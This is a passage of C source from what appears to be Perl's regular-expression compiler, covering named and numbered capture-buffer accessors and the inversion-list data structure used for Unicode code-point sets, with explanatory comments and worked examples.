Perl_reg_named_buff_nextkey(pTHX_ REGEXP * const r, const U32 flags)
{
struct regexp *const rx = ReANY(r);
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_REG_NAMED_BUFF_NEXTKEY;
if (rx && RXp_PAREN_NAMES(rx)) {
HV *hv = RXp_PAREN_NAMES(rx);
HE *temphe;
while ( (temphe = hv_iternext_flags(hv, 0)) ) {
IV i;
IV parno = 0;
SV* sv_dat = HeVAL(temphe);
I32 *nums = (I32*)SvPVX(sv_dat);
for ( i = 0; i < SvIVX(sv_dat); i++ ) {
if ((I32)(rx->lastparen) >= nums[i] &&
rx->offs[nums[i]].start != -1 &&
rx->offs[nums[i]].end != -1)
{
parno = nums[i];
break;
}
}
if (parno || flags & RXapif_ALL) {
return newSVhek(HeKEY_hek(temphe));
}
}
}
return NULL;
}
SV*
Perl_reg_named_buff_scalar(pTHX_ REGEXP * const r, const U32 flags)
{
SV *ret;
AV *av;
SSize_t length;
struct regexp *const rx = ReANY(r);
PERL_ARGS_ASSERT_REG_NAMED_BUFF_SCALAR;
if (rx && RXp_PAREN_NAMES(rx)) {
if (flags & (RXapif_ALL | RXapif_REGNAMES_COUNT)) {
return newSViv(HvTOTALKEYS(RXp_PAREN_NAMES(rx)));
} else if (flags & RXapif_ONE) {
ret = CALLREG_NAMED_BUFF_ALL(r, (flags | RXapif_REGNAMES));
av = MUTABLE_AV(SvRV(ret));
length = av_tindex(av);
SvREFCNT_dec_NN(ret);
return newSViv(length + 1);
} else {
Perl_croak(aTHX_ "panic: Unknown flags %d in named_buff_scalar",
(int)flags);
return NULL;
}
}
return &PL_sv_undef;
}
SV*
Perl_reg_named_buff_all(pTHX_ REGEXP * const r, const U32 flags)
{
struct regexp *const rx = ReANY(r);
AV *av = newAV();
PERL_ARGS_ASSERT_REG_NAMED_BUFF_ALL;
if (rx && RXp_PAREN_NAMES(rx)) {
HV *hv= RXp_PAREN_NAMES(rx);
HE *temphe;
(void)hv_iterinit(hv);
while ( (temphe = hv_iternext_flags(hv, 0)) ) {
IV i;
IV parno = 0;
SV* sv_dat = HeVAL(temphe);
I32 *nums = (I32*)SvPVX(sv_dat);
for ( i = 0; i < SvIVX(sv_dat); i++ ) {
if ((I32)(rx->lastparen) >= nums[i] &&
rx->offs[nums[i]].start != -1 &&
rx->offs[nums[i]].end != -1)
{
parno = nums[i];
break;
}
}
if (parno || flags & RXapif_ALL) {
av_push(av, newSVhek(HeKEY_hek(temphe)));
}
}
}
return newRV_noinc(MUTABLE_SV(av));
}
void
Perl_reg_numbered_buff_fetch(pTHX_ REGEXP * const r, const I32 paren,
SV * const sv)
{
struct regexp *const rx = ReANY(r);
char *s = NULL;
SSize_t i = 0;
SSize_t s1, t1;
I32 n = paren;
PERL_ARGS_ASSERT_REG_NUMBERED_BUFF_FETCH;
if ( n == RX_BUFF_IDX_CARET_PREMATCH
|| n == RX_BUFF_IDX_CARET_FULLMATCH
|| n == RX_BUFF_IDX_CARET_POSTMATCH
)
{
bool keepcopy = cBOOL(rx->extflags & RXf_PMf_KEEPCOPY);
if (!keepcopy) {
/* on something like
* $r = qr/.../;
         * /$r/p;
* the KEEPCOPY is set on the PMOP rather than the regex */
if (PL_curpm && r == PM_GETRE(PL_curpm))
keepcopy = cBOOL(PL_curpm->op_pmflags & PMf_KEEPCOPY);
}
if (!keepcopy)
goto ret_undef;
}
if (!rx->subbeg)
goto ret_undef;
if (n == RX_BUFF_IDX_CARET_FULLMATCH)
/* no need to distinguish between them any more */
n = RX_BUFF_IDX_FULLMATCH;
if ((n == RX_BUFF_IDX_PREMATCH || n == RX_BUFF_IDX_CARET_PREMATCH)
&& rx->offs[0].start != -1)
{
/* $`, ${^PREMATCH} */
i = rx->offs[0].start;
s = rx->subbeg;
}
else
if ((n == RX_BUFF_IDX_POSTMATCH || n == RX_BUFF_IDX_CARET_POSTMATCH)
&& rx->offs[0].end != -1)
{
/* $', ${^POSTMATCH} */
s = rx->subbeg - rx->suboffset + rx->offs[0].end;
i = rx->sublen + rx->suboffset - rx->offs[0].end;
}
else
if ( 0 <= n && n <= (I32)rx->nparens &&
(s1 = rx->offs[n].start) != -1 &&
(t1 = rx->offs[n].end) != -1)
{
/* $&, ${^MATCH}, $1 ... */
i = t1 - s1;
s = rx->subbeg + s1 - rx->suboffset;
} else {
goto ret_undef;
}
assert(s >= rx->subbeg);
assert((STRLEN)rx->sublen >= (STRLEN)((s - rx->subbeg) + i) );
if (i >= 0) {
#ifdef NO_TAINT_SUPPORT
sv_setpvn(sv, s, i);
#else
const int oldtainted = TAINT_get;
TAINT_NOT;
sv_setpvn(sv, s, i);
TAINT_set(oldtainted);
#endif
if (RXp_MATCH_UTF8(rx))
SvUTF8_on(sv);
else
SvUTF8_off(sv);
if (TAINTING_get) {
if (RXp_MATCH_TAINTED(rx)) {
if (SvTYPE(sv) >= SVt_PVMG) {
MAGIC* const mg = SvMAGIC(sv);
MAGIC* mgt;
TAINT;
SvMAGIC_set(sv, mg->mg_moremagic);
SvTAINT(sv);
if ((mgt = SvMAGIC(sv))) {
mg->mg_moremagic = mgt;
SvMAGIC_set(sv, mg);
}
} else {
TAINT;
SvTAINT(sv);
}
} else
SvTAINTED_off(sv);
}
} else {
ret_undef:
sv_set_undef(sv);
return;
}
}
void
Perl_reg_numbered_buff_store(pTHX_ REGEXP * const rx, const I32 paren,
SV const * const value)
{
PERL_ARGS_ASSERT_REG_NUMBERED_BUFF_STORE;
PERL_UNUSED_ARG(rx);
PERL_UNUSED_ARG(paren);
PERL_UNUSED_ARG(value);
if (!PL_localizing)
Perl_croak_no_modify();
}
I32
Perl_reg_numbered_buff_length(pTHX_ REGEXP * const r, const SV * const sv,
const I32 paren)
{
struct regexp *const rx = ReANY(r);
I32 i;
I32 s1, t1;
PERL_ARGS_ASSERT_REG_NUMBERED_BUFF_LENGTH;
if ( paren == RX_BUFF_IDX_CARET_PREMATCH
|| paren == RX_BUFF_IDX_CARET_FULLMATCH
|| paren == RX_BUFF_IDX_CARET_POSTMATCH
)
{
bool keepcopy = cBOOL(rx->extflags & RXf_PMf_KEEPCOPY);
if (!keepcopy) {
/* on something like
* $r = qr/.../;
         * /$r/p;
* the KEEPCOPY is set on the PMOP rather than the regex */
if (PL_curpm && r == PM_GETRE(PL_curpm))
keepcopy = cBOOL(PL_curpm->op_pmflags & PMf_KEEPCOPY);
}
if (!keepcopy)
goto warn_undef;
}
/* Some of this code was originally in C<Perl_magic_len> in F<mg.c> */
switch (paren) {
case RX_BUFF_IDX_CARET_PREMATCH: /* ${^PREMATCH} */
case RX_BUFF_IDX_PREMATCH: /* $` */
if (rx->offs[0].start != -1) {
i = rx->offs[0].start;
if (i > 0) {
s1 = 0;
t1 = i;
goto getlen;
}
}
return 0;
case RX_BUFF_IDX_CARET_POSTMATCH: /* ${^POSTMATCH} */
case RX_BUFF_IDX_POSTMATCH: /* $' */
if (rx->offs[0].end != -1) {
i = rx->sublen - rx->offs[0].end;
if (i > 0) {
s1 = rx->offs[0].end;
t1 = rx->sublen;
goto getlen;
}
}
return 0;
default: /* $& / ${^MATCH}, $1, $2, ... */
if (paren <= (I32)rx->nparens &&
(s1 = rx->offs[paren].start) != -1 &&
(t1 = rx->offs[paren].end) != -1)
{
i = t1 - s1;
goto getlen;
} else {
warn_undef:
if (ckWARN(WARN_UNINITIALIZED))
report_uninit((const SV *)sv);
return 0;
}
}
getlen:
if (i > 0 && RXp_MATCH_UTF8(rx)) {
const char * const s = rx->subbeg - rx->suboffset + s1;
const U8 *ep;
STRLEN el;
i = t1 - s1;
if (is_utf8_string_loclen((U8*)s, i, &ep, &el))
i = el;
}
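    /* For example, when the match data are UTF-8, a capture holding the two
     * bytes "\xc3\xa9" (U+00E9) reports a length of 1 here rather than 2. */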
return i;
}
SV*
Perl_reg_qr_package(pTHX_ REGEXP * const rx)
{
PERL_ARGS_ASSERT_REG_QR_PACKAGE;
PERL_UNUSED_ARG(rx);
if (0)
return NULL;
else
return newSVpvs("Regexp");
}
/* Scans the name of a named buffer from the pattern.
* If flags is REG_RSN_RETURN_NULL returns null.
* If flags is REG_RSN_RETURN_NAME returns an SV* containing the name
* If flags is REG_RSN_RETURN_DATA returns the data SV* corresponding
* to the parsed name as looked up in the RExC_paren_names hash.
* If there is an error throws a vFAIL().. type exception.
*/
#define REG_RSN_RETURN_NULL 0
#define REG_RSN_RETURN_NAME 1
#define REG_RSN_RETURN_DATA 2
STATIC SV*
S_reg_scan_name(pTHX_ RExC_state_t *pRExC_state, U32 flags)
{
char *name_start = RExC_parse;
SV* sv_name;
PERL_ARGS_ASSERT_REG_SCAN_NAME;
assert (RExC_parse <= RExC_end);
if (RExC_parse == RExC_end) NOOP;
else if (isIDFIRST_lazy_if_safe(RExC_parse, RExC_end, UTF)) {
/* Note that the code here assumes well-formed UTF-8. Skip IDFIRST by
* using do...while */
if (UTF)
do {
RExC_parse += UTF8SKIP(RExC_parse);
} while ( RExC_parse < RExC_end
&& isWORDCHAR_utf8_safe((U8*)RExC_parse, (U8*) RExC_end));
else
do {
RExC_parse++;
} while (RExC_parse < RExC_end && isWORDCHAR(*RExC_parse));
} else {
RExC_parse++; /* so the <- from the vFAIL is after the offending
character */
vFAIL("Group name must start with a non-digit word character");
}
sv_name = newSVpvn_flags(name_start, (int)(RExC_parse - name_start),
SVs_TEMP | (UTF ? SVf_UTF8 : 0));
if ( flags == REG_RSN_RETURN_NAME)
return sv_name;
else if (flags==REG_RSN_RETURN_DATA) {
HE *he_str = NULL;
SV *sv_dat = NULL;
        if ( ! sv_name ) /* should not happen */
Perl_croak(aTHX_ "panic: no svname in reg_scan_name");
if (RExC_paren_names)
he_str = hv_fetch_ent( RExC_paren_names, sv_name, 0, 0 );
if ( he_str )
sv_dat = HeVAL(he_str);
if ( ! sv_dat ) { /* Didn't find group */
/* It might be a forward reference; we can't fail until we
* know, by completing the parse to get all the groups, and
* then reparsing */
if (ALL_PARENS_COUNTED) {
vFAIL("Reference to nonexistent named group");
}
else {
REQUIRE_PARENS_PASS;
}
}
return sv_dat;
}
Perl_croak(aTHX_ "panic: bad flag %lx in reg_scan_name",
(unsigned long) flags);
}
#define DEBUG_PARSE_MSG(funcname) DEBUG_PARSE_r({ \
if (RExC_lastparse!=RExC_parse) { \
Perl_re_printf( aTHX_ "%s", \
Perl_pv_pretty(aTHX_ RExC_mysv1, RExC_parse, \
RExC_end - RExC_parse, 16, \
"", "", \
PERL_PV_ESCAPE_UNI_DETECT | \
PERL_PV_PRETTY_ELLIPSES | \
PERL_PV_PRETTY_LTGT | \
PERL_PV_ESCAPE_RE | \
PERL_PV_PRETTY_EXACTSIZE \
) \
); \
} else \
Perl_re_printf( aTHX_ "%16s",""); \
\
if (RExC_lastnum!=RExC_emit) \
Perl_re_printf( aTHX_ "|%4d", RExC_emit); \
else \
Perl_re_printf( aTHX_ "|%4s",""); \
Perl_re_printf( aTHX_ "|%*s%-4s", \
(int)((depth*2)), "", \
(funcname) \
); \
RExC_lastnum=RExC_emit; \
RExC_lastparse=RExC_parse; \
})
#define DEBUG_PARSE(funcname) DEBUG_PARSE_r({ \
DEBUG_PARSE_MSG((funcname)); \
Perl_re_printf( aTHX_ "%4s","\n"); \
})
#define DEBUG_PARSE_FMT(funcname,fmt,args) DEBUG_PARSE_r({\
DEBUG_PARSE_MSG((funcname)); \
Perl_re_printf( aTHX_ fmt "\n",args); \
})
/* This section of code defines the inversion list object and its methods. The
* interfaces are highly subject to change, so as much as possible is static to
* this file. An inversion list is here implemented as a malloc'd C UV array
 * wrapped in an SVt_INVLIST scalar.
*
* An inversion list for Unicode is an array of code points, sorted by ordinal
* number. Each element gives the code point that begins a range that extends
* up-to but not including the code point given by the next element. The final
* element gives the first code point of a range that extends to the platform's
* infinity. The even-numbered elements (invlist[0], invlist[2], invlist[4],
* ...) give ranges whose code points are all in the inversion list. We say
* that those ranges are in the set. The odd-numbered elements give ranges
* whose code points are not in the inversion list, and hence not in the set.
* Thus, element [0] is the first code point in the list. Element [1]
* is the first code point beyond that not in the list; and element [2] is the
* first code point beyond that that is in the list. In other words, the first
* range is invlist[0]..(invlist[1]-1), and all code points in that range are
* in the inversion list. The second range is invlist[1]..(invlist[2]-1), and
* all code points in that range are not in the inversion list. The third
* range invlist[2]..(invlist[3]-1) gives code points that are in the inversion
* list, and so forth. Thus every element whose index is divisible by two
* gives the beginning of a range that is in the list, and every element whose
* index is not divisible by two gives the beginning of a range not in the
* list. If the final element's index is divisible by two, the inversion list
* extends to the platform's infinity; otherwise the highest code point in the
* inversion list is the contents of that element minus 1.
*
* A range that contains just a single code point N will look like
* invlist[i] == N
* invlist[i+1] == N+1
*
* If N is UV_MAX (the highest representable code point on the machine), N+1 is
* impossible to represent, so element [i+1] is omitted. The single element
* inversion list
* invlist[0] == UV_MAX
* contains just UV_MAX, but is interpreted as matching to infinity.
*
 * Taking the complement of (inverting) an inversion list is quite simple: if the
* first element is 0, remove it; otherwise add a 0 element at the beginning.
* This implementation reserves an element at the beginning of each inversion
* list to always contain 0; there is an additional flag in the header which
* indicates if the list begins at the 0, or is offset to begin at the next
* element. This means that the inversion list can be inverted without any
* copying; just flip the flag.
*
* More about inversion lists can be found in "Unicode Demystified"
* Chapter 13 by Richard Gillam, published by Addison-Wesley.
*
* The inversion list data structure is currently implemented as an SV pointing
* to an array of UVs that the SV thinks are bytes. This allows us to have an
* array of UV whose memory management is automatically handled by the existing
* facilities for SV's.
*
* Some of the methods should always be private to the implementation, and some
* should eventually be made public */
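/* A small illustrative example (not part of the API): the set of ASCII
 * letters { 'A'..'Z', 'a'..'z' } would have the 4-element body
 *      { 0x41, 0x5B, 0x61, 0x7B }
 * meaning [0x41,0x5A] is in the set, [0x5B,0x60] is not, [0x61,0x7A] is, and
 * everything from 0x7B upwards is not.  Its complement merely gains a leading
 * 0 element:
 *      { 0x00, 0x41, 0x5B, 0x61, 0x7B }
 * which, thanks to the offset flag described above, requires no copying. */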
/* The header definitions are in F<invlist_inline.h> */
#ifndef PERL_IN_XSUB_RE
PERL_STATIC_INLINE UV*
S__invlist_array_init(SV* const invlist, const bool will_have_0)
{
/* Returns a pointer to the first element in the inversion list's array.
* This is called upon initialization of an inversion list. Where the
* array begins depends on whether the list has the code point U+0000 in it
* or not. The other parameter tells it whether the code that follows this
* call is about to put a 0 in the inversion list or not. The first
* element is either the element reserved for 0, if TRUE, or the element
* after it, if FALSE */
bool* offset = get_invlist_offset_addr(invlist);
UV* zero_addr = (UV *) SvPVX(invlist);
PERL_ARGS_ASSERT__INVLIST_ARRAY_INIT;
/* Must be empty */
assert(! _invlist_len(invlist));
*zero_addr = 0;
/* 1^1 = 0; 1^0 = 1 */
*offset = 1 ^ will_have_0;
return zero_addr + *offset;
}
PERL_STATIC_INLINE void
S_invlist_set_len(pTHX_ SV* const invlist, const UV len, const bool offset)
{
/* Sets the current number of elements stored in the inversion list.
* Updates SvCUR correspondingly */
PERL_UNUSED_CONTEXT;
PERL_ARGS_ASSERT_INVLIST_SET_LEN;
assert(is_invlist(invlist));
SvCUR_set(invlist,
(len == 0)
? 0
: TO_INTERNAL_SIZE(len + offset));
assert(SvLEN(invlist) == 0 || SvCUR(invlist) <= SvLEN(invlist));
}
STATIC void
S_invlist_replace_list_destroys_src(pTHX_ SV * dest, SV * src)
{
/* Replaces the inversion list in 'dest' with the one from 'src'. It
* steals the list from 'src', so 'src' is made to have a NULL list. This
* is similar to what SvSetMagicSV() would do, if it were implemented on
* inversion lists, though this routine avoids a copy */
const UV src_len = _invlist_len(src);
const bool src_offset = *get_invlist_offset_addr(src);
const STRLEN src_byte_len = SvLEN(src);
char * array = SvPVX(src);
const int oldtainted = TAINT_get;
PERL_ARGS_ASSERT_INVLIST_REPLACE_LIST_DESTROYS_SRC;
assert(is_invlist(src));
assert(is_invlist(dest));
assert(! invlist_is_iterating(src));
assert(SvCUR(src) == 0 || SvCUR(src) < SvLEN(src));
/* Make sure it ends in the right place with a NUL, as our inversion list
* manipulations aren't careful to keep this true, but sv_usepvn_flags()
* asserts it */
array[src_byte_len - 1] = '\0';
TAINT_NOT; /* Otherwise it breaks */
sv_usepvn_flags(dest,
(char *) array,
src_byte_len - 1,
/* This flag is documented to cause a copy to be avoided */
SV_HAS_TRAILING_NUL);
TAINT_set(oldtainted);
SvPV_set(src, 0);
SvLEN_set(src, 0);
SvCUR_set(src, 0);
/* Finish up copying over the other fields in an inversion list */
*get_invlist_offset_addr(dest) = src_offset;
invlist_set_len(dest, src_len, src_offset);
*get_invlist_previous_index_addr(dest) = 0;
invlist_iterfinish(dest);
}
PERL_STATIC_INLINE IV*
S_get_invlist_previous_index_addr(SV* invlist)
{
/* Return the address of the IV that is reserved to hold the cached index
* */
PERL_ARGS_ASSERT_GET_INVLIST_PREVIOUS_INDEX_ADDR;
assert(is_invlist(invlist));
return &(((XINVLIST*) SvANY(invlist))->prev_index);
}
PERL_STATIC_INLINE IV
S_invlist_previous_index(SV* const invlist)
{
/* Returns cached index of previous search */
PERL_ARGS_ASSERT_INVLIST_PREVIOUS_INDEX;
return *get_invlist_previous_index_addr(invlist);
}
PERL_STATIC_INLINE void
S_invlist_set_previous_index(SV* const invlist, const IV index)
{
/* Caches <index> for later retrieval */
PERL_ARGS_ASSERT_INVLIST_SET_PREVIOUS_INDEX;
assert(index == 0 || index < (int) _invlist_len(invlist));
*get_invlist_previous_index_addr(invlist) = index;
}
PERL_STATIC_INLINE void
S_invlist_trim(SV* invlist)
{
/* Free the not currently-being-used space in an inversion list */
/* But don't free up the space needed for the 0 UV that is always at the
* beginning of the list, nor the trailing NUL */
const UV min_size = TO_INTERNAL_SIZE(1) + 1;
PERL_ARGS_ASSERT_INVLIST_TRIM;
assert(is_invlist(invlist));
SvPV_renew(invlist, MAX(min_size, SvCUR(invlist) + 1));
}
PERL_STATIC_INLINE void
S_invlist_clear(pTHX_ SV* invlist) /* Empty the inversion list */
{
PERL_ARGS_ASSERT_INVLIST_CLEAR;
assert(is_invlist(invlist));
invlist_set_len(invlist, 0, 0);
invlist_trim(invlist);
}
#endif /* ifndef PERL_IN_XSUB_RE */
PERL_STATIC_INLINE bool
S_invlist_is_iterating(SV* const invlist)
{
PERL_ARGS_ASSERT_INVLIST_IS_ITERATING;
return *(get_invlist_iter_addr(invlist)) < (STRLEN) UV_MAX;
}
#ifndef PERL_IN_XSUB_RE
PERL_STATIC_INLINE UV
S_invlist_max(SV* const invlist)
{
/* Returns the maximum number of elements storable in the inversion list's
* array, without having to realloc() */
PERL_ARGS_ASSERT_INVLIST_MAX;
assert(is_invlist(invlist));
/* Assumes worst case, in which the 0 element is not counted in the
* inversion list, so subtracts 1 for that */
return SvLEN(invlist) == 0 /* This happens under _new_invlist_C_array */
? FROM_INTERNAL_SIZE(SvCUR(invlist)) - 1
: FROM_INTERNAL_SIZE(SvLEN(invlist)) - 1;
}
STATIC void
S_initialize_invlist_guts(pTHX_ SV* invlist, const Size_t initial_size)
{
PERL_ARGS_ASSERT_INITIALIZE_INVLIST_GUTS;
/* First 1 is in case the zero element isn't in the list; second 1 is for
* trailing NUL */
SvGROW(invlist, TO_INTERNAL_SIZE(initial_size + 1) + 1);
invlist_set_len(invlist, 0, 0);
/* Force iterinit() to be used to get iteration to work */
invlist_iterfinish(invlist);
*get_invlist_previous_index_addr(invlist) = 0;
}
SV*
Perl__new_invlist(pTHX_ IV initial_size)
{
/* Return a pointer to a newly constructed inversion list, with enough
* space to store 'initial_size' elements. If that number is negative, a
* system default is used instead */
SV* new_list;
if (initial_size < 0) {
initial_size = 10;
}
new_list = newSV_type(SVt_INVLIST);
initialize_invlist_guts(new_list, initial_size);
return new_list;
}
SV*
Perl__new_invlist_C_array(pTHX_ const UV* const list)
{
/* Return a pointer to a newly constructed inversion list, initialized to
* point to <list>, which has to be in the exact correct inversion list
* form, including internal fields. Thus this is a dangerous routine that
* should not be used in the wrong hands. The passed in 'list' contains
* several header fields at the beginning that are not part of the
* inversion list body proper */
const STRLEN length = (STRLEN) list[0];
const UV version_id = list[1];
const bool offset = cBOOL(list[2]);
#define HEADER_LENGTH 3
/* If any of the above changes in any way, you must change HEADER_LENGTH
* (if appropriate) and regenerate INVLIST_VERSION_ID by running
* perl -E 'say int(rand 2**31-1)'
*/
#define INVLIST_VERSION_ID 148565664 /* This is a combination of a version and
data structure type, so that one being
passed in can be validated to be an
inversion list of the correct vintage.
*/
SV* invlist = newSV_type(SVt_INVLIST);
PERL_ARGS_ASSERT__NEW_INVLIST_C_ARRAY;
if (version_id != INVLIST_VERSION_ID) {
Perl_croak(aTHX_ "panic: Incorrect version for previously generated inversion list");
}
/* The generated array passed in includes header elements that aren't part
* of the list proper, so start it just after them */
SvPV_set(invlist, (char *) (list + HEADER_LENGTH));
SvLEN_set(invlist, 0); /* Means we own the contents, and the system
shouldn't touch it */
*(get_invlist_offset_addr(invlist)) = offset;
/* The 'length' passed to us is the physical number of elements in the
* inversion list. But if there is an offset the logical number is one
* less than that */
invlist_set_len(invlist, length - offset, offset);
invlist_set_previous_index(invlist, 0);
/* Initialize the iteration pointer. */
invlist_iterfinish(invlist);
SvREADONLY_on(invlist);
return invlist;
}
STATIC void
S_invlist_extend(pTHX_ SV* const invlist, const UV new_max)
{
/* Grow the maximum size of an inversion list */
PERL_ARGS_ASSERT_INVLIST_EXTEND;
assert(is_invlist(invlist));
/* Add one to account for the zero element at the beginning which may not
* be counted by the calling parameters */
SvGROW((SV *)invlist, TO_INTERNAL_SIZE(new_max + 1));
}
STATIC void
S__append_range_to_invlist(pTHX_ SV* const invlist,
const UV start, const UV end)
{
/* Subject to change or removal. Append the range from 'start' to 'end' at
* the end of the inversion list. The range must be above any existing
* ones. */
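    /* Example (illustrative only): appending the range [0x100, 0x1FF] to a
     * list whose current final entry is 0x50 (the first value not already in
     * the set) appends the two elements 0x100 and 0x200, 0x200 being the
     * first code point beyond the new range. */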
UV* array;
UV max = invlist_max(invlist);
UV len = _invlist_len(invlist);
bool offset;
PERL_ARGS_ASSERT__APPEND_RANGE_TO_INVLIST;
if (len == 0) { /* Empty lists must be initialized */
offset = start != 0;
array = _invlist_array_init(invlist, ! offset);
}
else {
/* Here, the existing list is non-empty. The current max entry in the
* list is generally the first value not in the set, except when the
* set extends to the end of permissible values, in which case it is
* the first entry in that final set, and so this call is an attempt to
* append out-of-order */
UV final_element = len - 1;
array = invlist_array(invlist);
if ( array[final_element] > start
|| ELEMENT_RANGE_MATCHES_INVLIST(final_element))
{
Perl_croak(aTHX_ "panic: attempting to append to an inversion list, but wasn't at the end of the list, final=%" UVuf ", start=%" UVuf ", match=%c",
array[final_element], start,
ELEMENT_RANGE_MATCHES_INVLIST(final_element) ? 't' : 'f');
}
/* Here, it is a legal append. If the new range begins 1 above the end
* of the range below it, it is extending the range below it, so the
* new first value not in the set is one greater than the newly
* extended range. */
offset = *get_invlist_offset_addr(invlist);
if (array[final_element] == start) {
if (end != UV_MAX) {
array[final_element] = end + 1;
}
else {
/* But if the end is the maximum representable on the machine,
* assume that infinity was actually what was meant. Just let
* the range that this would extend to have no end */
invlist_set_len(invlist, len - 1, offset);
}
return;
}
}
/* Here the new range doesn't extend any existing set. Add it */
len += 2; /* Includes an element each for the start and end of range */
    /* If we'll overflow the existing space, extend, which may cause the array to
* be moved */
if (max < len) {
invlist_extend(invlist, len);
/* Have to set len here to avoid assert failure in invlist_array() */
invlist_set_len(invlist, len, offset);
array = invlist_array(invlist);
}
else {
invlist_set_len(invlist, len, offset);
}
/* The next item on the list starts the range, the one after that is
* one past the new range. */
array[len - 2] = start;
if (end != UV_MAX) {
array[len - 1] = end + 1;
}
else {
/* But if the end is the maximum representable on the machine, just let
* the range have no end */
invlist_set_len(invlist, len - 1, offset);
}
}
SSize_t
Perl__invlist_search(SV* const invlist, const UV cp)
{
/* Searches the inversion list for the entry that contains the input code
* point <cp>. If <cp> is not in the list, -1 is returned. Otherwise, the
* return value is the index into the list's array of the range that
* contains <cp>, that is, 'i' such that
* array[i] <= cp < array[i+1]
*/
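    /* For instance (illustrative only), with the array { 0x41, 0x5B, 0x61,
     * 0x7B } a search for 0x63 ('c') returns 2, while a search for 0x20
     * returns -1 because it precedes the first element. */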
IV low = 0;
IV mid;
IV high = _invlist_len(invlist);
const IV highest_element = high - 1;
const UV* array;
PERL_ARGS_ASSERT__INVLIST_SEARCH;
/* If list is empty, return failure. */
if (high == 0) {
return -1;
}
/* (We can't get the array unless we know the list is non-empty) */
array = invlist_array(invlist);
mid = invlist_previous_index(invlist);
assert(mid >=0);
if (mid > highest_element) {
mid = highest_element;
}
/* <mid> contains the cache of the result of the previous call to this
* function (0 the first time). See if this call is for the same result,
* or if it is for mid-1. This is under the theory that calls to this
* function will often be for related code points that are near each other.
* And benchmarks show that caching gives better results. We also test
* here if the code point is within the bounds of the list. These tests
* replace others that would have had to be made anyway to make sure that
* the array bounds were not exceeded, and these give us extra information
* at the same time */
if (cp >= array[mid]) {
if (cp >= array[highest_element]) {
return highest_element;
}
/* Here, array[mid] <= cp < array[highest_element]. This means that
* the final element is not the answer, so can exclude it; it also
* means that <mid> is not the final element, so can refer to 'mid + 1'
* safely */
if (cp < array[mid + 1]) {
return mid;
}
high--;
low = mid + 1;
}
    else { /* cp < array[mid] */
if (cp < array[0]) { /* Fail if outside the array */
return -1;
}
high = mid;
if (cp >= array[mid - 1]) {
goto found_entry;
}
}
/* Binary search. What we are looking for is <i> such that
* array[i] <= cp < array[i+1]
* The loop below converges on the i+1. Note that there may not be an
* (i+1)th element in the array, and things work nonetheless */
while (low < high) {
mid = (low + high) / 2;
assert(mid <= highest_element);
if (array[mid] <= cp) { /* cp >= array[mid] */
low = mid + 1;
/* We could do this extra test to exit the loop early.
if (cp < array[low]) {
return mid;
}
*/
}
else { /* cp < array[mid] */
high = mid;
}
}
found_entry:
high--;
invlist_set_previous_index(invlist, high);
return high;
}
void
Perl__invlist_union_maybe_complement_2nd(pTHX_ SV* const a, SV* const b,
const bool complement_b, SV** output)
{
/* Take the union of two inversion lists and point '*output' to it. On
* input, '*output' MUST POINT TO NULL OR TO AN SV* INVERSION LIST (possibly
* even 'a' or 'b'). If to an inversion list, the contents of the original
* list will be replaced by the union. The first list, 'a', may be
* NULL, in which case a copy of the second list is placed in '*output'.
* If 'complement_b' is TRUE, the union is taken of the complement
* (inversion) of 'b' instead of b itself.
*
* The basis for this comes from "Unicode Demystified" Chapter 13 by
* Richard Gillam, published by Addison-Wesley, and explained at some
* length there. The preface says to incorporate its examples into your
* code at your own risk.
*
* The algorithm is like a merge sort. */
const UV* array_a; /* a's array */
const UV* array_b;
UV len_a; /* length of a's array */
UV len_b;
SV* u; /* the resulting union */
UV* array_u;
UV len_u = 0;
UV i_a = 0; /* current index into a's array */
UV i_b = 0;
UV i_u = 0;
/* running count, as explained in the algorithm source book; items are
* stopped accumulating and are output when the count changes to/from 0.
* The count is incremented when we start a range that's in an input's set,
* and decremented when we start a range that's not in a set. So this
* variable can be 0, 1, or 2. When it is 0 neither input is in their set,
* and hence nothing goes into the union; 1, just one of the inputs is in
* its set (and its current range gets added to the union); and 2 when both
* inputs are in their sets. */
UV count = 0;
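    /* A small worked example of the scheme (hypothetical inputs): with
     * a = { 5, 10 } (matching 5..9) and b = { 8, 15 } (matching 8..14), the
     * count conceptually goes 0->1 at 5 (so 5 starts an output range), 1->2
     * at 8, 2->1 at 10, and back to 0 at 15 (so 15 ends the output range),
     * giving the union { 5, 15 }, which matches 5..14. */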
PERL_ARGS_ASSERT__INVLIST_UNION_MAYBE_COMPLEMENT_2ND;
assert(a != b);
assert(*output == NULL || is_invlist(*output));
len_b = _invlist_len(b);
if (len_b == 0) {
        /* Here, 'b' is empty, hence its complement is all possible code
* points. So if the union includes the complement of 'b', it includes
* everything, and we need not even look at 'a'. It's easiest to
* create a new inversion list that matches everything. */
if (complement_b) {
SV* everything = _add_range_to_invlist(NULL, 0, UV_MAX);
if (*output == NULL) { /* If the output didn't exist, just point it
at the new list */
*output = everything;
}
else { /* Otherwise, replace its contents with the new list */
invlist_replace_list_destroys_src(*output, everything);
SvREFCNT_dec_NN(everything);
}
return;
}
/* Here, we don't want the complement of 'b', and since 'b' is empty,
* the union will come entirely from 'a'. If 'a' is NULL or empty, the
* output will be empty */
if (a == NULL || _invlist_len(a) == 0) {
if (*output == NULL) {
*output = _new_invlist(0);
}
else {
invlist_clear(*output);
}
return;
}
/* Here, 'a' is not empty, but 'b' is, so 'a' entirely determines the
* union. We can just return a copy of 'a' if '*output' doesn't point
* to an existing list */
if (*output == NULL) {
*output = invlist_clone(a, NULL);
return;
}
/* If the output is to overwrite 'a', we have a no-op, as it's
* already in 'a' */
if (*output == a) {
return;
}
/* Here, '*output' is to be overwritten by 'a' */
u = invlist_clone(a, NULL);
invlist_replace_list_destroys_src(*output, u);
SvREFCNT_dec_NN(u);
return;
}
/* Here 'b' is not empty. See about 'a' */
if (a == NULL || ((len_a = _invlist_len(a)) == 0)) {
/* Here, 'a' is empty (and b is not). That means the union will come
* entirely from 'b'. If '*output' is NULL, we can directly return a
* clone of 'b'. Otherwise, we replace the contents of '*output' with
* the clone */
SV ** dest = (*output == NULL) ? output : &u;
*dest = invlist_clone(b, NULL);
if (complement_b) {
_invlist_invert(*dest);
}
if (dest == &u) {
invlist_replace_list_destroys_src(*output, u);
SvREFCNT_dec_NN(u);
}
return;
}
/* Here both lists exist and are non-empty */
array_a = invlist_array(a);
array_b = invlist_array(b);
    /* If we are to take the union of 'a' with the complement of 'b', set it
     * up so we are looking at b's complement. */
if (complement_b) {
/* To complement, we invert: if the first element is 0, remove it. To
* do this, we just pretend the array starts one later */
if (array_b[0] == 0) {
array_b++;
len_b--;
}
else {
